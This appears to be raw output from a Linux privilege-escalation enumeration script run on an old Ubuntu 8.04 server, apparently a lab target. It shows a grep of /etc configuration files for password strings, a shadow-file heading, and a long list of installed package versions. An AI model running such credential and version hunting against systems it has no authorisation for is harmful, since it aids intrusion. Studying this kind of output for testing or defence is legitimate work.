    /etc/samba/smb.conf:# password with the SMB password when the encrypted SMB password in the
    /etc/samba/smb.conf:;   unix password sync = no
    /etc/samba/smb.conf:# For Unix password sync to work on a Debian GNU/Linux system, the following
    /etc/samba/smb.conf:   passwd chat = *Enter\snew\sUNIX\spassword:* %n\n *Retype\snew\sUNIX\spassword:* %n\n .
    /etc/samba/smb.conf:# This boolean controls whether PAM will be used for password changes
    /etc/samba/smb.conf:;   pam password change = no
    /etc/ltrace.conf:; pwd.h
    /etc/proftpd/proftpd.conf:# Uncomment this if you are using NIS or LDAP via NSS to retrieve passwords:
    /etc/proftpd/proftpd.conf:# This is required to use both PAM-based authentication and local passwords
    /etc/proftpd/sql.conf:# Use both a crypted or plaintext password
    /etc/proftpd/sql.conf:# Use a backend-crypted or a crypted password
    /etc/proftpd/sql.conf:#SQLConnectInfo proftpd@sql.example.com proftpd_user proftpd_password
    /etc/proftpd/ldap.conf:#LDAPDNInfo "cn=admin,dc=example,dc=com" "admin_password"
    /etc/proftpd/ldap.conf:#LDAPDNInfo "cn=admin,dc=example,dc=com" "admin_password"
    /etc/hdparm.conf:# --security-set-pass Set security password
    /etc/hdparm.conf:# security_pass = password
    /etc/hdparm.conf:# --user-master Select password to use
    /etc/devscripts.conf:# options may be used to specify the username and password to use.
    /etc/devscripts.conf:# If only a username is provided then the password will be prompted for
    /etc/ssl/openssl.cnf:# input_password = secret
    /etc/ssl/openssl.cnf:# output_password = secret
    /etc/ssl/openssl.cnf:challengePassword		= A challenge password
    /etc/postgresql/8.3/main/postgresql.conf:#password_encryption = on
    /etc/cowpoke.conf:# using a simple password (or worse, a normal user password), then you can
[+] Shadow File (Privileged)
[*] ENUMERATING PROCESSES AND APPLICATIONS...
[+] Installed Packages
    Status=Not/Installed/Config-f/Unpacked/Failed-cfg/Half-inst/t-aWait/T-pend
    Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err:
    Name Version
    adduser 3.105ubuntu1  and remove users and groups
    ant 1.7.0-3  based build tool like make
    antlr 2.7.6-10  tool for constructing recognizers,
    apache2 2.2.8-1  generation, scalable, extendable web se
    apache2-mpm-prefork 2.2.8-1ubuntu0.15  model for Apache HTTPD
    apache2-utils 2.2.8-1ubuntu0.15  programs for webservers
    apache2.2-common 2.2.8-1ubuntu0.15  generation, scalable, extendable web se
    apparmor 2.1+1075-0ubuntu9  parser utility for AppArmor
    apparmor-utils 2.1+1075-0ubuntu9  for controlling AppArmor
    apt 0.7.9ubuntu17  front-end for dpkg
    apt-utils 0.7.9ubuntu17  utility programs
    aptitude 0.4.9-2ubuntu5  package manager
    at 3.1.10ubuntu4  job execution and batch processing
    autoconf 2.61-4  configure script builder
    autoconf2.59 2.59-1  configure script builder (obsolete
    base-files 4.0.1ubuntu5  base system miscellaneous files
    base-passwd 3.5.16  base system master password and group
    bash 3.2-0ubuntu16  GNU Bourne Again SHell
    bash-completion 20060301-3ubuntu3  completion for the bash shell
    belocs-locales-bin 2.4-2.2ubuntu7  for compiling locale data files
    bind9 1:9.4.2-10  Domain Name Server
    bind9-host 1:9.4.2-10  of 'host' bundled with BIND 9.X
    binutils 2.18.1~cvs20080103-0ubuntu1  GNU assembler, linker and binary utiliti
    bsdmainutils 6.1.10ubuntu2  of more utilities from FreeBSD
    bsdutils 1:2.13.1-5ubuntu1  utilities from 4.4BSD-Lite
    busybox-initramfs 1:1.1.3-5ubuntu12  shell setup for initramfs
    bzip2 1.0.4-2ubuntu4  block-sorting file compressor -
    comerr-dev 2.1-1.40.8-2ubuntu2  error description library - headers a
    command-not-found 0.2.17ubuntu1  installation of packages in interact
    command-not-found-data 0.2.17ubuntu1  of data files for command-not-found.
    console-setup 1.21ubuntu8  up the font and the keyboard on the cons
    console-terminus 4.20-6  fonts for fast reading on the Li
    console-tools 1:0.2.3dbs-65ubuntu7  console and font utilities
    coreutils 6.10-3ubuntu2  GNU core utilities
    cpio 2.9-6ubuntu1  cpio -- a program to manage archives of
    cpp 4:4.2.3-1ubuntu6  GNU C preprocessor (cpp)
    cpp-4.2 4.2.4-1ubuntu4  GNU C preprocessor
    cron 3.0pl1-100ubuntu2  of regular background processing
    curl 7.18.0-1ubuntu2.3  a file from an HTTP, HTTPS or FTP server
    dash 0.5.4-8ubuntu1  shell
    debconf 1.5.20  configuration management system
    debconf-i18n 1.5.20  internationalization support for debcon
    debhelper 7.0.13ubuntu1~hardy1  programs for debian/rules
    debianutils 2.28.2-0ubuntu1  utilities specific to Debian
    defoma 0.11.10-0.2  Font Manager -- automatic font config
    devscripts 2.10.39ubuntu2~hardy1  to make the life of a Debian Package
    dhcp3-client 3.0.6.dfsg-1ubuntu9  client
    dhcp3-common 3.0.6.dfsg-1ubuntu9  files used by all the dhcp3* packages
    diff 2.8.1-12ubuntu1  comparison utilities
    diffstat 1.45-2  graph of changes introduced by a di
    distcc 2.18.3-4.1ubuntu1  distributed compiler client and serve
    dmidecode 2.9-1ubuntu1  Desktop Management Interface data
    dmsetup 2:1.02.20-2ubuntu2  Linux Kernel Device Mapper userspace lib
    dnsutils 1:9.4.2-10  provided with BIND
    dosfstools 2.11-2.3ubuntu1  to create and check MS-DOS FAT fil
    dpkg 1.14.16.6ubuntu3  maintenance system for Debian
    dpkg-dev 1.14.16.6ubuntu4.1  building tools for Debian
    e2fslibs 1.40.8-2ubuntu2  filesystem libraries
    e2fsprogs 1.40.8-2ubuntu2  file system utilities and libraries
    ecj 3.3.0+0728-5  version of the Eclipse Java compi
    ecj-gcj 3.3.0+0728-5  version of the Eclipse Java compi
    ed 0.7-1ubuntu1  classic unix line editor
    eject 2.1.5-6  CDs and operates CD-Changers under Li
    esound-common 0.2.38-0ubuntu9  Sound Daemon - Common files
    eterm 0.9.4.0debian1-2ubuntu3  Terminal Emulator
    ethtool 6-0  or change ethernet card settings
    fakeroot 1.9ubuntu1.1  a fake root environment
    fastjar 2:0.95-1ubuntu2  creation utility
    fdutils 5.5-20060227-1.1  floppy utilities
    figlet 2.2.2-1ubuntu1  Ian & Glenn's Letters
    file 4.21-3  file type using "magic" numbers
    filezilla 3.0.11.1-0ubuntu1~hardy1  of the famous Win32 graphical FTP clien
    filezilla-common 3.0.11.1-0ubuntu1~hardy1  independent files for filezilla
    findutils 4.2.32-1ubuntu2  for finding files--find, xargs
    firefox 3.6.17+build3+nobinonly-0ubuntu0.8.04.1  and easy web browser from Mozilla
    firefox-3.0 3.6.17+build3+nobinonly-0ubuntu0.8.04.1  upgrade package for firefox-3.0 -> fir
    firefox-branding 3.6.17+build3+nobinonly-0ubuntu0.8.04.1  that ships the firefox branding
    fluxbox 1.1.1-1~hardy1  configurable and low resource X11 Win
    fontconfig 2.5.0-2ubuntu3  font configuration library - support
    fontconfig-config 2.5.0-2ubuntu3  font configuration library - configu
    friendly-recovery 0.1  recovery more user-friendly
    ftp 0.17-16build1  FTP client
    ftpd 0.17-27  server
    fuse-utils 2.7.2-1ubuntu2  in USErspace (utilities)
    g++ 4:4.2.3-1ubuntu6  GNU C++ compiler
    g++-4.2 4.2.4-1ubuntu4  GNU C++ compiler
    gappletviewer-4.2 4.2.4-1ubuntu3  application to execute Java (tm)
    gcc 4:4.2.3-1ubuntu6  GNU C compiler
    gcc-4.2 4.2.4-1ubuntu4  GNU C compiler
    gcc-4.2-base 4.2.4-1ubuntu4  GNU Compiler Collection (base package)
    gcj-4.2 4.2.4-1ubuntu3  GNU compiler for Java(TM)
    gcj-4.2-base 4.2.4-1ubuntu3  GNU Compiler Collection (gcj base packag
    gconf2 2.22.0-0ubuntu3  configuration database system (support
    gconf2-common 2.22.0-0ubuntu3  configuration database system (common
    gdb 6.8-1ubuntu3  GNU Debugger
    gettext 0.17-2ubuntu1  Internationalization utilities
    gettext-base 0.17-2ubuntu1  Internationalization utilities for the b
    gij 4:4.2.3-1ubuntu6  GNU Java bytecode interpreter
    gij-4.2 4.2.4-1ubuntu3  GNU Java bytecode interpreter
    gjdoc 0.7.8-6  generation framework for java
    gnupg 1.4.6-2ubuntu5  privacy guard - a free PGP replacement
    gpgv 1.4.6-2ubuntu5  privacy guard - signature verification t
    grep 2.5.3~dfsg-3  grep, egrep and fgrep
    groff-base 1.18.1.1-16  troff text-formatting system (base syste
    grub 0.97-29ubuntu21.2  Unified Bootloader
    gzip 1.3.12-3.2  GNU compression utility
    hdparm 8.6-1ubuntu1  hard disk parameters for high performan
    hostname 2.94  to set/show the host name or domain
    html2text 1.3.2a-3build2  advanced HTML to text converter
    ifupdown 0.6.8ubuntu8  level tools to configure network interf
    info 4.11.dfsg.1-4  GNU Info documentation browser
    initramfs-tools 0.85eubuntu36  for generating an initramfs
    initscripts 2.86.ds1-14.1ubuntu45  for initializing and shutting down t
    inputattach 1.23-0ubuntu2  to attach serial devices to the inpu
    installation-report 2.31ubuntu1  installation report
    intltool-debian 0.35.0+20060710.1  i18n of RFC822 compliant config files
    iproute 20071016-2ubuntu1  tools to control the networking
    iptables 1.3.8.0debian1-1ubuntu2  tools for packet filtering an
    iputils-arping 3:20071127-1  to send ICMP echo requests to an ARP ad
    iputils-ping 3:20071127-1  to test the reachability of network ho
    iputils-tracepath 3:20071127-1  to trace the network path to a remote
    java-common 0.28ubuntu3  of all Java packages
    java-gcj-compat 1.0.77-2ubuntu2  runtime environment using GIJ
    java-gcj-compat-dev 1.0.77-2ubuntu2  runtime environment with GCJ
    java-gcj-compat-headless 1.0.77-2ubuntu2  runtime environment using GIJ (headless
    jsvc 1.0.2~svn20061127-6  to launch Java applications as daemo
    klibc-utils 1.5.7-4ubuntu3  statically-linked utilities built with
    klogd 1.5-1ubuntu1  Logging Daemon
    laptop-detect 0.13.2ubuntu1  to detect a laptop
    less 418-1  program similar to more
    libacl1 2.2.45-1  control list shared library
    libapache2-mod-php5 5.2.4-2ubuntu5.24  HTML-embedded scripting languag
    libapr1 1.2.11-1  Apache Portable Runtime Library
    libaprutil1 1.2.12+dfsg-3  Apache Portable Runtime Utility Library
    libasound2 1.0.15-3ubuntu4  library
    libaspell15 0.60.5-1ubuntu2  Aspell spell-checker runtime library
    libast2 0.7-2  Library of Assorted Spiffy Things
    libatk1.0-0 1.22.0-0ubuntu1  ATK accessibility toolkit
    libatm1 2.4.1-17.1build1  library for ATM (Asynchronous Transfe
    libattr1 1:2.4.39-1  attribute shared library
    libaudiofile0 0.2.6-7ubuntu1.8.04.1  version of SGI's audiofile libra
    libavahi-client3 0.6.22-2ubuntu4.3  client library
    libavahi-common-data 0.6.22-2ubuntu4.3  common data files
    libavahi-common3 0.6.22-2ubuntu4.3  common library
    libavahi-glib1 0.6.22-2ubuntu4.3  glib integration library
    libbcel-java 5.2-3ubuntu1  create, and manipulate (binary) Jav
    libbind9-30 1:9.4.2-10  Shared Library used by BIND
    libblkid1 1.40.8-2ubuntu2  device id library
    libbz2-1.0 1.0.4-2ubuntu4  block-sorting file compressor l
    libc6 2.7-10ubuntu5  C Library: Shared libraries
    libc6-dev 2.7-10ubuntu5  C Library: Development Libraries and Hea
    libc6-i686 2.7-10ubuntu5  C Library: Shared libraries [i686 optimi
    libcairo2 1.6.0-0ubuntu2  Cairo 2D vector graphics library
    libcap1 1:1.10-14build1  for getting/setting POSIX.1e capabil
    libchromexvmc1 1:0.2.901-0ubuntu4  Libraries used by the Openchrome VIA dr
    libchromexvmcpro1 1:0.2.901-0ubuntu4  Pro Libraries used by the Openchrome VI
    libck-connector0 0.2.3-3ubuntu5  libraries
    libcomerr2 1.40.8-2ubuntu2  error description library
    libcommons-beanutils-java 1.8.0~beta-1  for manipulating JavaBeans
    libcommons-collections-java 2.1.1-8  set of abstract data type interfaces and i
    libcommons-collections3-java 3.1a-3.1  set of abstract data type interfaces and i
    libcommons-daemon-java 1.0.2~svn20061127-6  to launch Java applications as daemo
    libcommons-dbcp-java 1.2.2-1  Connection Pooling Services
    libcommons-digester-java 1.8-1  based XML Java object mapping tool
    libcommons-el-java 1.0-4  of the JSP2.0 Expression Lang
    libcommons-fileupload-java 1.2-2  upload capability to your servlets and
    libcommons-io-java 1.3.2-2  useful IO related classes
    libcommons-launcher-java 1.1-3  platform java application launcher
    libcommons-logging-java 1.1-1ubuntu1  wrapper interface for several loggin
    libcommons-modeler-java 2.0.1-4  library to use Java Management E
    libcommons-pool-java 1.3-1  implementation for Java objects
    libcommons-validator-java 1:1.3.1-1  and speed development and maintenance o
    libconsole 1:0.2.3dbs-65ubuntu7  libraries for Linux console and font
    libcupsys2 1.3.7-1ubuntu3.9  UNIX Printing System(tm) - libs
    libcurl3 7.18.0-1ubuntu2.3  file transfer library (OpenSS
    libcurl3-gnutls 7.18.0-1ubuntu2  file transfer library (GnuTLS
    libcurl4-openssl-dev 7.18.0-1ubuntu2.3  files and documentation for libc
    libcwidget3 0.5.8-1ubuntu1  terminal interface library for C+
    libdatrie0 0.1.2-2  trie library
    libdb4.6 4.6.21-6ubuntu1  v4.6 Database Libraries [runtime]
    libdbd-mysql-perl 4.005-1  Perl5 database interface to the MySQL data
    libdbi-perl 1.601-1  database interface by Tim Bunce
    libdbus-1-3 1.1.20-1ubuntu1  interprocess messaging system
    libdbus-glib-1-2 0.74-2ubuntu0.1  interprocess messaging system (GLib-b
    libdevmapper1.02.1 2:1.02.20-2ubuntu2  Linux Kernel Device Mapper userspace lib
    libdns32 1:9.4.2-10  Shared Library used by BIND
    libdrm2 2.3.0-4ubuntu1  interface to kernel DRM services -
    libecj-java 3.3.0+0728-5  Java compiler (library)
    libecj-java-gcj 3.3.0+0728-5  Java compiler (native library)
    libedit2 2.9.cvs.20050518-4  editline and history libraries
    libelfg0 0.8.6-4  ELF object file access library
    libesd-alsa0 0.2.38-0ubuntu9  Sound Daemon (ALSA) - Shared lib
    libevent1 1.3e-1  asynchronous event notification library
    libexpat1 2.0.1-0ubuntu1  parsing C library - runtime library
    libfontconfig1 2.5.0-2ubuntu3  font configuration library - runtime
    libfontenc1 1:1.0.4-2  font encoding library
    libfreetype6 2.3.5-1ubuntu4.8.04.2  2 font engine, shared library files
    libfribidi0 0.10.9-1  Implementation of the Unicode BiDi algo
    libfs6 2:1.0.0-4ubuntu2  Font Services library
    libfuse2 2.7.2-1ubuntu2  in USErspace library
    libgadu3 1:1.7~rc2-2ubuntu0.8.04.1  protocol library - runtime files
    libgc1c2 1:6.8-1.1  garbage collector for C and C++
    libgcc1 1:4.2.4-1ubuntu4  support library
    libgcj-bc 4.2.3-1ubuntu6  time only library for use with gcj
    libgcj-common 1:4.2.3-1ubuntu6  runtime library (common files)
    libgcj8-1 4.2.4-1ubuntu3  runtime library for use with gcj
    libgcj8-1-awt 4.2.4-1ubuntu3  peer runtime libraries for use with gcj
    libgcj8-dev 4.2.4-1ubuntu3  development headers for use with gcj
    libgcj8-jar 4.2.4-1ubuntu3  runtime library for use with gcj (jar f
    libgconf2-4 2.22.0-0ubuntu3  configuration database system (shared
    libgcrypt11 1.2.4-2ubuntu7  Crypto library - runtime library
    libgd2-xpm 2.0.35.dfsg-3ubuntu2.1  Graphics Library version 2
    libgdbm3 1.8.3-3  dbm database routines (runtime version)
    libgif4 4.1.6-4  for GIF images (library)
    libgl1-mesa-glx 7.0.3~rc2-1ubuntu3  free implementation of the OpenGL API -- G
    libglib2.0-0 2.16.6-0ubuntu1.2  GLib library of C routines
    libglu1-mesa 7.0.3~rc2-1ubuntu3  OpenGL utility library (GLU)
    libgnutls13 2.0.4-1ubuntu2  GNU TLS library - runtime library
    libgomp1 4.2.4-1ubuntu4  OpenMP (GOMP) support library
    libgpg-error0 1.4-2ubuntu7  for common error values and messages
    libgpmg1 1.19.6-25ubuntu1  Purpose Mouse - shared library
    libgssglue1 0.1-1  gssapi library
    libgstreamer-plugins-base0.10-0 0.10.18-3  libraries from the "base" set
    libgstreamer0.10-0 0.10.18-4ubuntu2  GStreamer libraries and elements
    libgtk2.0-0 2.12.9-3ubuntu5  GTK+ graphical user interface library
    libgtk2.0-common 2.12.9-3ubuntu5  files for the GTK+ graphical user int
    libgtkspell0 2.0.10-4  spell-checking addon for GTK's TextView wi
    libhal1 0.5.11~rc2-1ubuntu8.3  Abstraction Layer - shared library
    libhesiod0 3.0.2-18.1  for hesiod, a service name resolut
    libhtml-parser-perl 3.56-1  collection of modules that parse HTML text
    libhtml-tagset-perl 3.10-2  tables pertaining to HTML
    libhtml-tree-perl 3.23-1  and create HTML syntax trees
    libice6 2:1.0.4-1  Inter-Client Exchange library
    libid3tag0 0.15.1b-10  tag reading library from the MAD project
    libidl0 0.8.10-0.1  for parsing CORBA IDL files
    libidn11 1.1-1  libidn library, implementation of IETF I
    libidn11-dev 1.1-1  files GNU libidn, implementation
    libimlib2 1.4.0-1ubuntu1.2  image loading and rendering library
    libisc32 1:9.4.2-10  Shared Library used by BIND
    libisccc30 1:9.4.2-10  Channel Library used by BIND
    libisccfg30 1:9.4.2-10  File Handling Library used by BIND
    libiw29 29-1ubuntu2  tools - library
    libjaxp1.3-java 1.3.04-2  XML parser and transformer APIs (DOM, S
    libjpeg62 6b-14  Independent JPEG Group's JPEG runtime li
    libkadm55 1.6.dfsg.3~beta1-2ubuntu1.8  Kerberos administration runtime librarie
    libkeyutils1 1.2-4  Key Management Utilities (library)
    libklibc 1.5.7-4ubuntu3  libc subset for use with initramfs
    libkrb5-dev 1.6.dfsg.3~beta1-2ubuntu1.8  and development libraries for MIT Ke
    libkrb53 1.6.dfsg.3~beta1-2ubuntu1.8  Kerberos runtime libraries
    liblaunchpad-integration1 0.1.19  for launchpad integration
    libldap-2.4-2 2.4.9-0ubuntu0.8.04.3  libraries
    libldap2-dev 2.4.9-0ubuntu0.8.04.3  development libraries
    liblocale-gettext-perl 1.05-2ubuntu1  libc functions for internationalizatio
    liblog4j1.2-java 1.2.15-2  library for java
    liblwres30 1:9.4.2-10  Resolver Library used by BIND
    liblzo2-2 2.02-3  compression library
    libmagic1 4.21-3  type determination library using "magic
    libmeanwhile1 1.0.2-3  implementation of the Lotus Sametime Co
    libmx4j-java 3.0.1-3  open source implementation of the JMX(TM)
    libmysqlclient15off 5.0.51a-3ubuntu5  database client library
    libncurses5 5.6+20071124-1ubuntu2  libraries for terminal handling
    libncursesw5 5.6+20071124-1ubuntu2  libraries for terminal handling (wide
    libnet-daemon-perl 0.38-1.1  module for building portable Perl daemo
    libnewt0.52 0.52.2-11.2ubuntu1  Erik's Windowing Toolkit - text mode win
    libnfsidmap2 0.20-0build1  nfs idmapping library
    libnspr4-0d 4.8.6-0ubuntu0.8.04.1  Portable Runtime Library
    libnss3-1d 3.12.9+ckbi-1.82-0ubuntu0.8.04.1  Security Service libraries
    libntfs-3g23 1:1.2216-1ubuntu1  filesystem in userspace (FUSE) libra
    libopencdk10 0.6.6-1ubuntu1  Crypto Development Kit (OpenCDK) (runti
    liborbit2 1:2.14.12-0.1  for ORBit2 - a CORBA ORB
    liboro-java 2.0.8a-3  expression library for Java
    libpam-modules 0.99.7.1-5ubuntu6  Authentication Modules for PAM
    libpam-runtime 0.99.7.1-5ubuntu6  support for the PAM library
    libpam0g 0.99.7.1-5ubuntu6.1  Authentication Modules library
    libpam0g-dev 0.99.7.1-5ubuntu6.1  files for PAM
    libpango1.0-0 1.20.5-0ubuntu1.1  and rendering of internationalized te
    libpango1.0-common 1.20.5-0ubuntu1.1  and configuration files for the Pang
    libparted1.7-1 1.7.1-5.1ubuntu9  GNU Parted disk partitioning shared libr
    libpcap0.8 0.9.8-2  interface for user-level packet captu
    libpcre3 7.4-1ubuntu2  5 Compatible Regular Expression Library
    libperl5.8 5.8.8-12ubuntu0.5  Perl library
    libpixman-1-0 0.10.0-0ubuntu1  library for X and cairo
    libplrpc-perl 0.2017-1.1  extensions for writing PlRPC servers an
    libpng12-0 1.2.15~beta5-3ubuntu0.2  library - runtime
    libpopt-dev 1.10-3build1  for parsing cmdline parameters - develop
    libpopt0 1.10-3build1  for parsing cmdline parameters
    libpq5 8.3.1-1  C client library
    libpurple0 1:2.5.2-0ubuntu1.2~hardy1  instant messaging library
    libreadline5 5.2-3build1  readline and history libraries, run-time
    libregexp-java 1.4-4  expression library for Java
    librpc-xml-perl 0.59-2  module implementation of XML-RPC
    librpcsecgss3 0.17-1ubuntu2  secure rpc communication using the rp
    libruby1.8 1.8.6.111-2ubuntu1.3  necessary to run Ruby 1.8
    libsasl2-2 2.1.22.dfsg1-18ubuntu2  SASL - authentication abstraction libr
    libsasl2-modules 2.1.22.dfsg1-18ubuntu2  SASL - pluggable authentication module
    libselinux1 2.0.55-0ubuntu4  policy enforcement, run-time librari
    libsensors3 1:2.10.5-3ubuntu1  to read temperature/voltage/fan sens
    libsepol1 2.0.20-0ubuntu3  binary policy, run-time library
    libservlet2.3-java 4.0-10  2.3 and JSP 1.2 Java classes and doc
    libservlet2.4-java 5.0.30-6ubuntu1  2.4 and JSP 2.0 Java library.
    libsigc++-2.0-0c2a 2.0.17-2ubuntu3  Signal Framework for C++ - runtime
    libsilc-1.1-2 1.1.5-1ubuntu1  library (silc-toolkit)
    libslang2 2.1.3-2  S-Lang programming library - runtime ver
    libsm6 2:1.0.3-1  Session Management library
    libsnmp-base 5.4.1~dfsg-4ubuntu4.3  (Simple Network Management Protocol) MI
    libsnmp15 5.4.1~dfsg-4ubuntu4.3  (Simple Network Management Protocol) li
    libsqlite3-0 3.4.2-2  3 shared library
    libss2 1.40.8-2ubuntu2  interface parsing library
    libssl-dev 0.9.8g-4ubuntu3.18  development libraries, header files and
    libssl0.9.8 0.9.8g-4ubuntu3.18  shared libraries
    libstartup-notification0 0.9-1  for program launch feedback (shared
    libstdc++6 4.2.4-1ubuntu4  GNU Standard C++ Library v3
    libstdc++6-4.2-dev 4.2.4-1ubuntu4  GNU Standard C++ Library v3 (development
    libstruts1.2-java 1.2.9-3  Framework for MVC web applications
    libsysfs2 2.1.0-4  library to sysfs
    libt1-5 5.1.1-5  1 font rasterizer library - runtime
    libtasn1-3 1.1-1  ASN.1 structures (runtime)
    libterm-readkey-perl 2.30-3ubuntu1  perl module for simple terminal control
    libtext-charwidth-perl 0.04-4build1  display widths of characters on the term
    libtext-iconv-perl 1.4-3  between character sets in Perl
    libtext-wrapi18n-perl 0.06-5  substitute of Text::Wrap
    libthai-data 0.1.9-1ubuntu0.2  files for Thai language support library
    libthai0 0.1.9-1ubuntu0.2  language support library
    libtiff4 3.8.2-7ubuntu3.4  Image File Format (TIFF) library
    libtimedate-perl 1.1600-9  and date functions for Perl
    libtomcat5.5-java 5.5.25-5ubuntu1.2  Servlet engine -- core libraries
    liburi-perl 1.35.dfsg.1-1  and accesses URI strings
    libusb-0.1-4 2:0.1.12-8  USB programming library
    libuuid1 1.40.8-2ubuntu2  unique id library
    libvolume-id0 117-8  identification library
    libwrap0 7.6.dbs-14  Venema's TCP wrappers library
    libwww-perl 5.808-1  client/server library for Perl (aka LWP)
    libwxbase2.8-0 2.8.7.1-0ubuntu3  library (runtime) - non-GUI support c
    libwxgtk2.8-0 2.8.7.1-0ubuntu3  Cross-platform C++ GUI toolkit (GT
    libx11-6 2:1.1.3-1ubuntu2  client-side library
    libx11-data 2:1.1.3-1ubuntu2  client-side library
    libxau6 1:1.0.3-2  authorisation library
    libxaw7 2:1.0.4-1  Athena Widget library
    libxcb-xlib0 1.1-1ubuntu1  C Binding, Xlib/XCB interface library
    libxcb1 1.1-1ubuntu1  C Binding
    libxcomposite1 1:0.4.0-1  Composite extension library
    libxcursor1 1:1.1.9-1  cursor management library
    libxdamage1 1:1.1.1-3  damaged region extension library
    libxdmcp6 1:1.0.2-2  Display Manager Control Protocol library
    libxerces2-java 2.9.0-1  XML parser for Java with DOM leve
    libxext6 2:1.0.3-2build1  miscellaneous extension library
    libxfixes3 1:4.0.3-2  miscellaneous 'fixes' extension library
    libxfont1 1:1.3.1-2  font rasterisation library
    libxft2 2.1.12-2ubuntu5  font drawing library for X
    libxi6 2:1.1.3-1  Input extension library
    libxinerama1 2:1.0.2-1build1  Xinerama extension library
    libxkbfile1 1:1.0.4-1  keyboard file manipulation library
    libxml-parser-perl 2.34-4.3  module for parsing XML files
    libxml2 2.6.31.dfsg-2ubuntu1  XML library
    libxmu6 2:1.0.4-1  miscellaneous utility library
    libxmuu1 2:1.0.4-1  miscellaneous micro-utility library
    libxpm4 1:3.5.7-1  pixmap library
    libxrandr2 2:1.2.2-1  RandR extension library
    libxrender1 1:0.9.4-1  Rendering Extension client library
    libxss1 1:1.1.2-1  Screen Saver extension library
    libxt6 1:1.0.5-3  toolkit intrinsics library
    libxtrap6 2:1.0.0-4build1  event trapping extension library
    libxtst6 2:1.0.3-1  Testing -- Resource extension library
    libxv1 2:1.0.3-1ubuntu1  Video extension library
    libxxf86dga1 2:1.0.2-1  Direct Graphics Access extension library
    libxxf86misc1 1:1.0.1-2  XFree86 miscellaneous extension library
    libxxf86vm1 1:1.0.1-2  XFree86 video mode extension library
    libzephyr3 2.1.20070719.SNAPSHOT-1  original "Instant Message" system librar
    linux-image-2.6.24-16-server 2.6.24-16.30  kernel image for version 2.6.24 on x86
    linux-image-server 2.6.24.16.18  kernel image on Server Equipment.
    linux-libc-dev 2.6.24-27.68  Kernel Headers for development
    linux-server 2.6.24.16.18  Linux kernel on Server Equipment.
    linux-ubuntu-modules-2.6.24-16-server 2.6.24-16.23  supplied Linux modules for version 2.
    locales 2.7.9-4  files for locale support
    login 1:4.0.18.2-1ubuntu2  login tools
    logrotate 3.7.1-3  rotation utility
    lsb-base 3.2-4ubuntu1  Standard Base 3.2 init script function
    lsb-release 3.2-4ubuntu1  Standard Base version reporting utilit
    lshw 02.12.01-2ubuntu1  about hardware configuration
    lsof 4.78.dfsg.1-3  open files
    ltrace 0.5-3ubuntu1  runtime library calls in dynamically
    lvm2 2.02.26-1ubuntu9  Linux Logical Volume Manager
    lzma 4.43-12ubuntu1  method of 7z format in 7-Zip pro
    m4 1.4.10-1  macro processing language
    make 3.81-3build1  GNU version of the "make" utility.
    makedev 2.3.1-84ubuntu1  device files in /dev
    man-db 2.5.1-3  manual pager
    manpages 2.77-1  pages about using a GNU/Linux system
    mawk 1.3.3-11ubuntu2  pattern scanning and text processing langu
    mdetect 0.5.2.1ubuntu4  device autodetection tool
    memtest86+ 1.70-3ubuntu1  real-mode memory tester
    menu 2.1.38ubuntu2  programs menu for all menu-aware a
    mii-diag 2.11-2  little tool to manipulate network cards
    mime-support 3.39-1ubuntu1  files 'mime.types' & 'mailcap', and sup
    mktemp 1.5-5ubuntu2  unique filenames for temporary files
    mlocate 0.18-2ubuntu1  find files on the filesystem based o
    module-init-tools 3.3-pre11-4ubuntu5  for managing Linux kernel modules
    mount 2.13.1-5ubuntu1  for mounting and manipulating filesyst
    mtr-tiny 0.72-2ubuntu1  screen ncurses traceroute tool
    mysql-client-5.0 5.0.51a-3ubuntu5  database client binaries
    mysql-common 5.0.51a-3ubuntu5  database common files
    mysql-server 5.0.51a-3ubuntu5  database server (meta package dependin
    mysql-server-5.0 5.0.51a-3ubuntu5  database server binaries
    nano 2.0.7-1ubuntu1  Pico clone with some new features
    ncurses-base 5.6+20071124-1ubuntu2  of common terminal types
    ncurses-bin 5.6+20071124-1ubuntu2  programs and man pages
    net-tools 1.60-19ubuntu1  NET-3 networking toolkit
    netbase 4.30ubuntu1  TCP/IP networking system
    netcat 1.10-36  swiss army knife -- transitional pack
    netcat-traditional 1.10-36  swiss army knife
    nfs-common 1:1.1.2-2ubuntu2.2  support files common to client and serve
    nfs-kernel-server 1:1.1.2-2ubuntu2.2  for NFS kernel server
    nmap 4.53-3  Network Mapper
    ntfs-3g 1:1.2216-1ubuntu1  NTFS driver for FUSE
    ntpdate 1:4.2.4p4+dfsg-3ubuntu2  for setting system time from NTP serv
    openbsd-inetd 0.20050402-6  OpenBSD Internet Superserver
    openssh-client 1:4.7p1-8ubuntu1  shell client, an rlogin/rsh/rcp repla
    openssh-server 1:4.7p1-8ubuntu1  shell server, an rshd replacement
    openssl 0.9.8g-4ubuntu3  Socket Layer (SSL) binary and related
    p7zip-full 4.57~dfsg.1-1  and 7za file archivers with high compress
    parted 1.7.1-5.1ubuntu9  GNU Parted disk partition resizing progr
    passwd 1:4.0.18.2-1ubuntu2  and administer password and group dat
    patch 2.5.9-4  a diff file to an original
    pciutils 1:2.2.4-1.1ubuntu3  PCI Utilities
    pcmciautils 014-4ubuntu1  utilities for Linux 2.6
    perl 5.8.8-12ubuntu0.5  Wall's Practical Extraction and Report
    perl-base 5.8.8-12ubuntu0.5  Pathologically Eclectic Rubbish Lister
    perl-modules 5.8.8-12ubuntu0.5  Perl modules
    php5-cgi 5.2.4-2ubuntu5.10  HTML-embedded scripting languag
    php5-cli 5.2.4-2ubuntu5.10  interpreter for the php5 script
    php5-common 5.2.4-2ubuntu5.10  files for packages built from the php
    php5-gd 5.2.4-2ubuntu5.10  module for php5
    php5-mysql 5.2.4-2ubuntu5.10  module for php5
    pidgin 1:2.5.2-0ubuntu1.2~hardy1  multi-protocol instant messaging c
    pidgin-data 1:2.5.2-0ubuntu1.2~hardy1  instant messaging client - da
    pkg-config 0.22-1  compile and link flags for libraries
    po-debconf 1.0.10  translated Debconf templates files wi
    popularity-contest 1.43ubuntu1  for your favourite packages automatical
    portmap 6.0-4  RPC portmapper
    postfix 2.5.1-2ubuntu1  mail transport agent
    postgresql-8.3 8.3.1-1  SQL database, version 8.3
    postgresql-client-8.3 8.3.1-1  programs for PostgreSQL 8.3
    postgresql-client-common 87  for multiple PostgreSQL client versi
    postgresql-common 87  database-cluster manager
    ppp 2.4.4rel-9ubuntu2  Protocol (PPP) daemon
    pppconfig 2.3.17ubuntu1  text menu based utility for configuring pp
    pppoeconf 1.17ubuntu1  PPPoE/ADSL connections
    procps 1:3.2.7-5ubuntu2  file system utilities
